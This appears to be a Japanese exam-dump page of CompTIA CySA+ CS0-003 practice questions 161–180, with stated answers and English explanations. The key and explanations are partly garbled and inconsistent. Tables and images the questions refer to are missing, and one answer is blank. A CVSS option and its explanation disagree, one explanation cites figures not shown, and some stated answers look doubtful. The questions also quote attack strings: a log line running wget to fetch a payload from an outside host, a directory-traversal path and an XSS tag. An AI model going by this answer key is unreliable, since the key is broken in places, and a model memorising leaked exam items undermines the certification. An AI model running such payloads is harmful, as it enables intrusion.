PDFを無料でダウンロードにはCS0-003日本語有効な練習テスト問題があります [Q161-Q180]

Share

PDFを無料でダウンロードにはCS0-003日本語有効な練習テスト問題があります

CS0-003日本語テストエンジンお試しセット、CS0-003日本語問題集PDF

質問 # 161
ある開発者が、インストール パッケージにアドウェアがバンドルされているファイル転送アプリケーションをダウンロードしてインストールしようとしました。次世代のウイルス対策ソフトウェアはファイルの実行を阻止しましたが、デバイスからファイルを削除しませんでした。その後数日間、さらに多くの開発者が問題のファイルをダウンロードして実行しようとしました。この問題を最も効果的に解決するには、セキュリティ ツールに次のどの変更を加える必要がありますか。

  • A. Web プロキシ経由のファイルのダウンロードをブロックします。
  • B. すべての開発者ワークステーションから管理者権限を削除します。
  • C. 各ワークステーションからファイルを手動で削除します。
  • D. 次世代ウイルス対策システムでハッシュをブラックリストに登録します。

正解:A

解説:
In the question it states that the anti-virus is already preventing the file from executing, but it did not remove the file from the device. Later, more developers tried to DOWNLOAD and execute the same file. If the anti-virus is already preventing the execution of the file, then the real issue is the downloading of the file. By blocking the download, you can prevent anyone else from downloading that file while the AV is already preventing the execution of it. Unless by "blacklist" they also mean automatic deletion of said file when discovered and/or prevent it from being downloaded too.


質問 # 162
ある組織が企業 Web サイトに対して Web アプリケーションの脆弱性評価を実施したところ、次のような結果が観察されました。

セキュリティ アナリストが共有すべきチューニング推奨事項は次のうちどれですか?

  • A. クロスオリジンリソース共有ヘッダーを無効にします。
  • B. HttpOnlvflaq を設定して、HTTPS による通信を強制します。
  • C. 承認されたドメインに対する Access-Control-Allow-Origin ヘッダーを構成します。
  • D. X-Frame-Options ヘッダーのないリクエストをブロックします。

正解:D

解説:
The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame.


質問 # 163
セキュリティ アナリストは、さまざまな種類の脆弱性スキャンを実行します。脆弱性スキャンの結果を確認して、実行されたスキャンの種類と、各デバイスで誤検知が発生したかどうかを判断します。
説明書:
「生成された結果」ドロップダウン オプションを選択して、結果が認証スキャン、非認証スキャン、またはコンプライアンス スキャンから生成されたかどうかを判断します。
認証スキャンと非認証スキャンのみについて、誤検知の結果を評価し、誤検知が表示される結果を確認します。注: 現在選択されているオプションのチェックを外す場合は、オプションをもう一度クリックします。
最後に、脆弱性スキャンの結果に基づいて、サーバーを結果にドラッグしてサーバーの種類を特定します。
Linux Web サーバー、ファイル プリント サーバー、およびディレクトリ サーバーはドラッグ可能です。
いつでもシミュレーションの初期状態に戻したい場合は、[すべてリセット] ボタンを選択してください。シミュレーションが完了したら、[完了] ボタンを選択して送信してください。シミュレーションが送信されたら、[次へ] ボタンを選択して続行してください。

正解:

解説:


質問 # 164
最近のゼロデイ脆弱性が積極的に悪用されており、ユーザーの操作や権限の昇格を必要とせず、機密性と整合性に重大な影響を及ぼしますが、可用性には影響しません。次の CVE メトリックのうち、このゼロデイ脅威に最も正確なものはどれですか。

  • A. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
  • B. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
  • C. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
  • D. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L

正解:D

解説:
This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L). Official Reference: https://nvd.nist.gov/vuln-metrics/cvss


質問 # 165
最近の脆弱性スキャンでは、パッチ適用が必要な重大かつ高度な検出結果が異常に多数見つかりました。SLA では、特定の時間内に調査結果を修正することが求められています。SLA に従ってすべての脆弱性にパッチが適用されるようにするための最良のアプローチは次のうちどれですか?

  • A. 例外をリクエストし、各システムに手動でパッチを適用します。
  • B. IT サービス配信チケット発行システムを統合して、修復と終了を追跡します。
  • C. リスクを受け入れ、サポート終了として現在の資産を廃止します。
  • D. システムに完全にパッチが適用されるまで、補償制御項目を作成します。

正解:B


質問 # 166
インシデント対応チームは、インターネット障害の調査を開始するよう警告を受け取りました。この機能停止により、複数の場所にいるすべてのユーザーが外部 SaaS リソースにアクセスできなくなります。チームは、組織が DDoS 攻撃の影響を受けたと判断しました。チームは次のログのうちどれを最初に確認する必要がありますか?

  • A. DNS
  • B. CDN
  • C. 脆弱性スキャナー
  • D. Webサーバー

正解:A

解説:
A DDoS attack is a type of attack that floods a target with more traffic than it can handle. This can cause the target to become unavailable to legitimate users.
The DNS logs will show the IP addresses of the devices that were sending the traffic to the target.
This information can be used to identify the attackers.
The other logs may also be helpful in investigating a DDoS attack, but they are less likely to provide the same level of detail as the DNS logs.


質問 # 167
ある組織がデータ侵害を発見し、その結果、PII が一般に公開されました。教訓のレビュー中に、委員会は外部報告の責任者とタイミング要件に関する矛盾を特定しました。次のアクションのうち、報告の問題に最も適切に対処できるのはどれですか。

  • A. インシデントの種類ごとに特定の SLA と封じ込めアクションを示すプレイブックを作成する
  • B. 内部関係者に加えて外部への通知とインシデント報告が必要なセキュリティインシデントを定義する
  • C. 連邦法、規制遵守要件、組織ポリシーを調査して、特定のレポートSLAを文書化する
  • D. セキュリティチームと関係者内で特定の役割と責任を指定してタスクを効率化する

正解:C


質問 # 168
インシデント対応チームのメンバーが Linux サーバーをトリアージしています。出力は以下のとおりです。
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)攻撃者が実行しようとしている可能性が高いのは次のうちどれですか?

  • A. コマンドアンドコントロールサーバーにビーコンを送信します。
  • B. zsh という名前のバックドア ルート アカウントを作成します。
  • C. Web サーバーに対してサービス拒否攻撃を実行します。
  • D. セキュリティ保護されていないサービス アカウントを通じてコマンドを実行します。

正解:D

解説:
The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.


質問 # 169
悪用される可能性の高い 2 つの脆弱性に対するパッチが、同じ金曜日の午後にリリースされました。システムと脆弱性に関する情報は、以下の表に示されています。

セキュリティ アナリストが修復のために優先すべき項目は次のうちどれですか?

  • A. マニング
  • B. ブレイディ
  • C. 了解
  • D. ブリーズ

正解:B

解説:
Brady should be prioritized for remediation, as it has the highest risk score and the highest number of affected users. The risk score is calculated by multiplying the CVSS score by the exposure factor, which is the percentage of systems that are vulnerable to the exploit. Brady has a risk score of 9 x 0.8 = 7.2, which is higher than any other system. Brady also has 500 affected users, which is more than any other system. Therefore, patching brady would reduce the most risk and impact for the organization. The other systems have lower risk scores and lower numbers of affected users, so they can be remediated later.


質問 # 170
給与部門の従業員がフィッシング攻撃の標的となり、攻撃者は部門責任者になりすまし、口座振替情報を新しいアカウントに更新するよう要求しました。その後、不正な口座に入金が行われました。インシデント対応チームが攻撃の通知を受け取ったときに最初にとるべきアクションは次のうちどれですか?

  • A. 人事部に連絡し、従業員の解雇を推奨します。
  • B. ウイルスおよびマルウェア ツールを使用して従業員のコンピュータをスキャンします。
  • C. 従業員がとったアクションとイベントに関連する電子メールを確認します。
  • D. インシデントに関与した従業員にセキュリティ意識向上トレーニングを割り当てます。

正解:C

解説:
In case of a phishing attack, it's crucial to review what actions were taken by the employee and analyze the phishing email to understand its nature and impact.
Reference: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 6, page 246; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 6, page 255.


質問 # 171
エンド ユーザーが組織のポリシーで許可されていない Web サイトにアクセスしようとしたときに、セキュリティ アラートがトリガーされました。この行為は懲戒処分に値する違反行為とみなされるため、SOC アナリストは、ユーザーのワークステーションからの Web 検索を反映した認証ログ、Web ログ、および一時ファイルを収集して、調査の根拠を構築します。調査が HR またはプライバシー ポリシーに準拠していることを確認するための最適な方法は、次のうちどれですか。

  • A. アクティビティに関連付けられた日付スタンプ、ユーザーアカウントのホスト名、IP 情報を詳細に含むイベントのタイムラインを作成します。
  • B. ケースの詳細にユーザーを特定できる情報が反映されていないことを確認する証拠をパスワードで保護し、調査に関係する担当者のアクセスを制限する
  • C. アクティビティが意図的であったことを確認した後、SOC マネージャーに通知します。
  • D. チケットシステムで調査のコード名を作成し、アクセス権を持つすべての担当者が人事関連の調査としてケースを簡単に識別できないようにします。

正解:B

解説:
The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the case details do not reflect any user-identifiable information, such as name, email address, phone number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential discrimination or retaliation. Additionally, password protecting the evidence and restricting access to personnel related to the investigation can help preserve the integrity and security of the evidence and prevent any unauthorized or accidental disclosure or modification.


質問 # 172
セキュリティ アナリストは、同じ会社および地域に属するさまざまなソース ネットワークから考えられるネットワーク アドレスを特定しようとしています。次のシェル スクリプト関数のうち、目標の達成に役立つものはどれですか?

  • A. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
  • B. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
  • C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }
  • D. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }

正解:C

解説:
The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:
function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short } This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region


質問 # 173
セキュリティアナリストは、Web サーバーのログを確認しているときに、次のスニペットに気づきました。
.. \ .. / .. \ .. /boot.ini
次のどれが試みられたのでしょうか?

  • A. ディレクトリトラバーサル
  • B. /etc/passwd の列挙
  • C. クロスサイトスクリプティング
  • D. リモートコード実行
  • E. リモートファイルのインクルード

正解:A

解説:
The snippet shows an attempt to access the boot.ini file, which is a configuration file for Windows operating systems. The "... \ ... /" pattern is used to navigate up the directory structure and reach the root directory, where the boot.ini file is located. This is a common technique for exploiting directory traversal vulnerabilities, which allow an attacker to access files and directories outside the intended web server path. The other options are not relevant for this purpose: remote file inclusion involves injecting a malicious file into a web application; cross-site scripting involves injecting malicious scripts into a web page; remote code execution involves executing arbitrary commands on a remote system; enumeration of /etc/passwd involves accessing the file that stores user information on Linux systems.
Reference:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the objectives for the exam is to "use appropriate tools and methods to manage, prioritize and respond to attacks and vulnerabilities". The book also covers the usage and syntax of web server logs, which record the requests and responses of web applications, in chapter 6. Specifically, it explains the meaning and function of each component in web server logs, such as the HTTP method, the URL, the status code, and the user agent1, page 244. It also discusses the common types and indicators of web-based attacks, such as directory traversal, which use special characters to manipulate the web server path1, page 251. Therefore, this is a reliable source to verify the answer to the question.


質問 # 174
アナリストがトリアージする必要がある内部セキュリティ活動に関連するアラートの数を SOC チームが削減するのに役立つテクニックは次のどれですか?

  • A. SIEM内のすべてのアラームを70未満の低レベルでフィルタリングします
  • B. 無関係な通知や重複した通知を削除するSOARルールを追加します
  • C. SIEMに取り込まれたデータを拡充し、トリアージに必要なすべてのデータを含める
  • D. 脆弱性スキャンの実行時にアラートを無効にするタスクをスケジュールする

正解:B


質問 # 175
シミュレーション
開発者は最近、3 台の Web サーバーに新しいコードを導入しました。毎日自動実行される外部デバイス スキャン レポートには、PCI DSS に準拠していないサーバーの脆弱性が示されています。
脆弱性が有効でない場合、アナリストはスキャンをクリーンにするために適切な手順を実行する必要があります。
脆弱性が有効な場合、アナリストは発見された問題を修正する必要があります。
ネットワーク図に表示されている情報を確認した後、[STEP 2] タブを選択し、ドロップダウン オプションを使用してリストされている各サーバーの正しい検証結果と修復アクションを選択してシミュレーションを完了します。
説明書
ステップ 1: ネットワーク図に記載されている情報を確認します。
ステップ 2: シナリオに基づいて、脆弱性を解決するために必要な修復アクションを決定します。
いつでもシミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンを選択してください。





正解:

解説:
Web Server 01 - True Positive - Encrypt Entire Session
Web Server 02 - True Positive - Submit as a non-issue
Web Server 03 - True Positive - Request Certificate from a Public CA


質問 # 176
セキュリティ アナリストが Web サーバーのログを確認しているときに、次の行を発見しました。
<IMG SRC='vbscript:msgbox("test")'>
次の悪意のあるアクティビティのうちどれが試みられましたか?

  • A. クロスサイト スクリプティング
  • B. XML インジェクション
  • C. コマンドインジェクション
  • D. サーバー側のリクエスト フォージェリ

正解:A


質問 # 177
ネットワークアクティビティのレビューを完了した後。脅威ハンティング チームは、メール クライアント経由で社外の電子メール アドレスにアウトバウンド電子メールを毎日送信するネットワーク上のデバイスを発見します。
午後 10:00 に発生する可能性のあるものは次のうちどれですか?

  • A. データの引き出し
  • B. 不規則なピアツーピア通信
  • C. OSプロセスの異常な動作
  • D. ネットワーク上の不正なデバイス

正解:A

解説:
Data exfiltration is the theft or unauthorized transfer or movement of data from a device or network. It can occur as part of an automated attack or manually, on-site or through an internet connection, and involve various methods. It can affect personal or corporate data, such as sensitive or confidential information. Data exfiltration can be prevented or detected by using compression, encryption, authentication, authorization, and other controls1 The network activity shows that a device on the network is sending an outbound email via a mail client to a non-company email address daily at 10:00 p.m. This could indicate that the device is compromised by malware or an insider threat, and that the email is used to exfiltrate data from the network to an external party.
The email could contain attachments, links, or hidden data that contain the stolen information. The timing of the email could be designed to avoid detection by normal network monitoring or security systems.


質問 # 178
あるソフトウェア開発者は、不十分なログ機能を組み込むために、一般的なセキュリティ リスクを伴う Web アプリケーションを展開しています。次のアクションのうちどれが最も効果的ですか?
アプリケーション開発に伴うリスクを軽減するには?

  • A. OWASP のベスト プラクティスを使用して定期的にコード レビューを実施します。
  • B. サーバー側のログ記録と自動更新を実装します。
  • C. 統合開発環境を使用して静的解析を実行します。
  • D. 環境に補償コントロールを導入します。

正解:A

解説:
Conducting regular code reviews using OWASP best practices is the most effective action to reduce risks associated with the application development. Code reviews are a systematic examination of the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may compromise the security, functionality, or performance of the application. Code reviews can help to improve the quality and security of the code, as well as to identify and remediate common security risks, such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global nonprofit organization that provides free and open resources, tools, standards, and best practices for web application security. OWASP best practices for logging include following a common logging format and approach, logging relevant security events and data, protecting log data from unauthorized access or modification, and using log analysis and monitoring tools to detect and respond to security incidents. By following OWASP best practices for logging, developers can ensure that their web applications have sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.


質問 # 179
新しいサイバーセキュリティ アナリストは、組織に対する潜在的な脅威に関するエグゼクティブ ブリーフィングを作成する任務を負っています。ブリーフィングに必要なデータを生成するのは次のうちどれですか?

  • A. リスク評価
  • B. アクセス制御リスト
  • C. 侵害の兆候
  • D. ファイアウォールのログ

正解:C

解説:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats.


質問 # 180
......

あなたを合格させるCompTIA Cybersecurity Analyst CS0-003日本語試験問題集で2024年12月22日には328問あります:https://www.passtest.jp/CompTIA/CS0-003J-shiken.html